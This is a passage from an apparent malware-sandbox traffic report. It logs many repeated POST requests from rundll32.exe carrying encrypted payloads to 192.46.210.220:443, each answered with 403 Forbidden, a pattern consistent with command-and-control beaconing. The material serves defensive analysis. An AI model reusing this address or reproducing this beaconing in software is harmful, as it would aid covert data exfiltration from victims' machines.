                                                                                                      2021-10-28 03:04:06 UTC334OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:07 UTC339INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:07 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      68192.168.2.450118192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:08 UTC339OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:08 UTC339OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:09 UTC344INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:09 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      69192.168.2.450122192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:10 UTC344OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:10 UTC344OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:11 UTC349INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:11 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      7192.168.2.449804192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:03 UTC34OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:03 UTC35OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:04 UTC39INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:04 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      70192.168.2.450126192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:12 UTC349OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:12 UTC349OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:13 UTC354INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:13 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      71192.168.2.450130192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:14 UTC354OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:14 UTC354OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:15 UTC359INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:15 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      72192.168.2.450134192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:16 UTC359OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:16 UTC359OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:17 UTC364INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:17 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      73192.168.2.450138192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:19 UTC364OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:19 UTC364OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:19 UTC369INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:19 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      74192.168.2.450142192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:21 UTC369OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:21 UTC369OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:22 UTC374INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:22 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      75192.168.2.450146192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:23 UTC374OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:23 UTC374OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:23 UTC379INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:23 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      76192.168.2.450150192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:25 UTC379OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:25 UTC379OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:26 UTC384INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:26 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      77192.168.2.450154192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:26 UTC384OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:26 UTC384OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:27 UTC389INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:27 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      78192.168.2.450159192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:29 UTC389OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:04:29 UTC389OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:04:30 UTC394INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:04:30 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      79192.168.2.450161192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:04:30 UTC394OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
